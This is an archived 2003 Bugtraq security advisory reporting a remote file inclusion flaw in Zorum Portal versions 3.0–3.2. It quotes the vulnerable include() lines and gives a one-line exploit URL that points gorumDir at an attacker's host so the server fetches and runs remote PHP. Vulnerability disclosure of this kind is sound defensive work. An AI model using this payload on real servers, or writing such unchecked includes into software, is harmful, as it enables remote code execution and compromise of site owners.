[28555] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Zorum Portal (PHP)

daemon@ATHENA.MIT.EDU (MGhz)
Wed Jan 22 16:31:29 2003

Date: 22 Jan 2003 19:45:26 -0000
Message-ID: <20030122194526.32055.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: MGhz <magas@mail.lt>
To: bugtraq@securityfocus.com



Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
---------------------------------
include.php
---------------------------------

PHP Code:
---------------------------------
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
---------------------------------

--
magas@mail.lt


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[28555] in bugtraq

Zorum Portal (PHP)

daemon@ATHENA.MIT.EDU (MGhz)Wed Jan 22 16:31:29 2003

daemon@ATHENA.MIT.EDU (MGhz)
Wed Jan 22 16:31:29 2003